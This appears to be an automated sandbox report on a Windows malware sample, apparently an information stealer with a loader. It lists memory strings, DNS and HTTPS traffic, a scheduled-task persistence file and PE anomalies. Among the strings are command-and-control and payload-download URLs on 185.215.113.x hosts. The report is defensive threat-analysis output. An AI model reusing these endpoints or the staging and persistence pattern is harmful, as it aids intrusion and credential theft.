Source: global traffic	DNS traffic detected: DNS query: ogs.google.com
Source: global traffic	DNS traffic detected: DNS query: apis.google.com
Source: global traffic	DNS traffic detected: DNS query: play.google.com
Source: global traffic	DNS traffic detected: DNS query: atten-supporse.biz

Source: unknown

Source: skotes.exe, 00000014.00000002.2653686921.000000000129E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/luma/random.exe
Source: skotes.exe, 00000014.00000002.2653686921.000000000129E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/luma/random.exec61395d7
Source: skotes.exe, 00000014.00000002.2653686921.000000000129E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/luma/random.exelencoded
Source: file.exe, 00000000.00000002.1975584108.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1975584108.0000000000F88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exe
Source: file.exe, 00000000.00000002.1975584108.0000000000F88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exee
Source: file.exe, 00000000.00000002.1970779986.0000000000424000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1970779986.0000000000507000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1975584108.0000000000F2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000000.00000002.1975584108.0000000000F88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/freebl3.dll
Source: file.exe, 00000000.00000002.1975584108.0000000000F88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/mozglue.dll
Source: file.exe, 00000000.00000002.1975584108.0000000000F88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/mozglue.dllu
Source: file.exe, 00000000.00000002.1975584108.0000000000F88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/msvcp140.dll
Source: file.exe, 00000000.00000002.1975584108.0000000000F88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/msvcp140.dll.
Source: file.exe, 00000000.00000002.1975584108.0000000000F88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dll
Source: file.exe, 00000000.00000002.1975584108.0000000000F88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/softokn3.dll
Source: file.exe, 00000000.00000002.1975584108.0000000000F88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/sqlite3.dll
Source: file.exe, 00000000.00000002.1975584108.0000000000F88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/sqlite3.dllk
Source: file.exe, 00000000.00000002.1975584108.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/68b591d6548ec281/vcruntime140.dll
Source: file.exe, 00000000.00000002.1975584108.0000000000F88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/=
Source: file.exe, 00000000.00000002.1975584108.0000000000F88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/_
Source: file.exe, 00000000.00000002.1970779986.0000000000424000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2010313915.0000000023650000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1970779986.0000000000507000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: file.exe, 00000000.00000002.1970779986.0000000000507000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php423177b60194262422f8d727cf88
Source: file.exe, 00000000.00000002.1975584108.0000000000F74000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpDI
Source: file.exe, 00000000.00000002.2010313915.0000000023650000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpLy
Source: file.exe, 00000000.00000002.1970779986.0000000000424000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpation
Source: file.exe, 00000000.00000002.2010313915.0000000023650000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpp
Source: file.exe, 00000000.00000002.1970779986.0000000000507000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.206AKKming
Source: skotes.exe, 00000014.00000002.2653686921.000000000129E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpS
Source: skotes.exe, 00000014.00000002.2653686921.000000000129E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php_
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: chromecache_105.5.dr	String found in binary or memory: http://www.broofa.com
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe, file.exe, 00000000.00000002.2015373067.000000006FE3D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: file.exe, 00000000.00000002.2014124649.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2007520480.000000001D502000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: file.exe, 00000000.00000002.1975584108.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp, JJJJEBGD.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chromecache_105.5.dr	String found in binary or memory: https://apis.google.com
Source: file.exe, 00000000.00000002.2010313915.0000000023650000.00000004.00000020.00020000.00000000.sdmp, CBAKEBGIIDAFIDHIIECF.0.dr	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.
Source: file.exe, 00000000.00000002.2010313915.0000000023650000.00000004.00000020.00020000.00000000.sdmp, CBAKEBGIIDAFIDHIIECF.0.dr	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta
Source: file.exe, 00000000.00000002.1975584108.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp, JJJJEBGD.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000002.1975584108.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp, JJJJEBGD.0.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000002.1975584108.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp, JJJJEBGD.0.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000002.2010313915.0000000023650000.00000004.00000020.00020000.00000000.sdmp, CBAKEBGIIDAFIDHIIECF.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: file.exe, 00000000.00000002.2010313915.0000000023650000.00000004.00000020.00020000.00000000.sdmp, CBAKEBGIIDAFIDHIIECF.0.dr	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000000.00000002.1975584108.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp, JJJJEBGD.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000002.1975584108.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp, JJJJEBGD.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000002.1975584108.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp, JJJJEBGD.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: chromecache_105.5.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey200-36dp/2x/gm_alert_gm_grey200_3
Source: chromecache_105.5.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey600-36dp/2x/gm_alert_gm_grey600_3
Source: chromecache_105.5.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey200-24dp/1x/gm_close_gm_grey200_2
Source: chromecache_105.5.dr	String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey600-24dp/1x/gm_close_gm_grey600_2
Source: CBAKEBGIIDAFIDHIIECF.0.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://mozilla.org0/
Source: chromecache_105.5.dr	String found in binary or memory: https://play.google.com/log?format=json&hasfast=true
Source: IDHCGDAFBKFIDHJJJDHCBFBGHD.0.dr	String found in binary or memory: https://support.mozilla.org
Source: IDHCGDAFBKFIDHJJJDHCBFBGHD.0.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: IDHCGDAFBKFIDHJJJDHCBFBGHD.0.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.elMx_wJzrE6l
Source: file.exe, 00000000.00000002.2010313915.0000000023650000.00000004.00000020.00020000.00000000.sdmp, CBAKEBGIIDAFIDHIIECF.0.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: file.exe, 00000000.00000002.1975584108.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp, JJJJEBGD.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: chromecache_105.5.dr	String found in binary or memory: https://www.google.com
Source: file.exe, 00000000.00000002.1975584108.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp, JJJJEBGD.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chromecache_105.5.dr	String found in binary or memory: https://www.gstatic.com/gb/html/afbp.html
Source: chromecache_105.5.dr	String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_medium.css
Source: chromecache_105.5.dr	String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_small.css
Source: file.exe, 00000000.00000002.2010313915.0000000023650000.00000004.00000020.00020000.00000000.sdmp, CBAKEBGIIDAFIDHIIECF.0.dr	String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: IDHCGDAFBKFIDHJJJDHCBFBGHD.0.dr	String found in binary or memory: https://www.mozilla.org
Source: file.exe, 00000000.00000002.1970779986.0000000000455000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1970779986.0000000000424000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: IDHCGDAFBKFIDHJJJDHCBFBGHD.0.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
Source: file.exe, 00000000.00000002.1970779986.0000000000455000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1970779986.0000000000424000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: IDHCGDAFBKFIDHJJJDHCBFBGHD.0.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
Source: IDHCGDAFBKFIDHJJJDHCBFBGHD.0.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000002.1970779986.0000000000455000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: file.exe, 00000000.00000003.1857281479.00000000238C7000.00000004.00000020.00020000.00000000.sdmp, IDHCGDAFBKFIDHJJJDHCBFBGHD.0.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: file.exe, 00000000.00000002.1970779986.0000000000455000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49676 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49671 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

Source: unknown	HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.8:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.8:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.8:49727 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.8:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.165.166:443 -> 192.168.2.8:49743 version: TLS 1.2

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: random[1].exe.0.dr	Static PE information: section name:
Source: random[1].exe.0.dr	Static PE information: section name: .idata
Source: KJJJKFIIIJ.exe.0.dr	Static PE information: section name:
Source: KJJJKFIIIJ.exe.0.dr	Static PE information: section name: .idata
Source: skotes.exe.16.dr	Static PE information: section name:
Source: skotes.exe.16.dr	Static PE information: section name: .idata
Source: random[1].exe.20.dr	Static PE information: section name:
Source: random[1].exe.20.dr	Static PE information: section name: .idata
Source: random[1].exe.20.dr	Static PE information: section name:
Source: 5762ea743c.exe.20.dr	Static PE information: section name:
Source: 5762ea743c.exe.20.dr	Static PE information: section name: .idata
Source: 5762ea743c.exe.20.dr	Static PE information: section name:

Contains functionality to call native functions

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Code function: 20_2_00A2CB97 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers,

20_2_00A2CB97

Creates files inside the system directory

Source: C:\Users\user\Documents\KJJJKFIIIJ.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Detected potential crypto function

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB5ECD0	0_2_6CB5ECD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAFECC0	0_2_6CAFECC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBDAC30	0_2_6CBDAC30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBC6C00	0_2_6CBC6C00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB0AC60	0_2_6CB0AC60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB04DB0	0_2_6CB04DB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC8CDC0	0_2_6CC8CDC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB96D90	0_2_6CB96D90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC2AD50	0_2_6CC2AD50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBCED70	0_2_6CBCED70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC88D20	0_2_6CC88D20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB86E90	0_2_6CB86E90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB0AEC0	0_2_6CB0AEC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBA0EC0	0_2_6CBA0EC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBE0E20	0_2_6CBE0E20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB9EE70	0_2_6CB9EE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB0EFB0	0_2_6CB0EFB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBDEFF0	0_2_6CBDEFF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB00FE0	0_2_6CB00FE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC48FB0	0_2_6CC48FB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB06F10	0_2_6CB06F10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBC2F70	0_2_6CBC2F70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC40F20	0_2_6CC40F20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB6EF40	0_2_6CB6EF40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC068E0	0_2_6CC068E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB50820	0_2_6CB50820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB8A820	0_2_6CB8A820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBD4840	0_2_6CBD4840
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBC09B0	0_2_6CBC09B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB909A0	0_2_6CB909A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBBA9A0	0_2_6CBBA9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC1C9E0	0_2_6CC1C9E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB349F0	0_2_6CB349F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB56900	0_2_6CB56900
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB38960	0_2_6CB38960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB7EA80	0_2_6CB7EA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBB8A30	0_2_6CBB8A30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBAEA00	0_2_6CBAEA00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB7CA70	0_2_6CB7CA70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBA0BA0	0_2_6CBA0BA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC06BE0	0_2_6CC06BE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC2A480	0_2_6CC2A480
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB464D0	0_2_6CB464D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB9A4D0	0_2_6CB9A4D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB8A430	0_2_6CB8A430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB64420	0_2_6CB64420
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB18460	0_2_6CB18460
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAF45B0	0_2_6CAF45B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB8E5F0	0_2_6CB8E5F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBCA5E0	0_2_6CBCA5E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC04540	0_2_6CC04540
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CC48550	0_2_6CC48550
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBA0570	0_2_6CBA0570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB62560	0_2_6CB62560
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB58540	0_2_6CB58540
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB5E6E0	0_2_6CB5E6E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB9E6E0	0_2_6CB9E6E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB246D0	0_2_6CB246D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB5C650	0_2_6CB5C650
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB2A7D0	0_2_6CB2A7D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB80700	0_2_6CB80700
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CB100B0	0_2_6CB100B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBDC0B0	0_2_6CBDC0B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CAF8090	0_2_6CAF8090
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBC8010	0_2_6CBC8010
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6CBCC000	0_2_6CBCC000
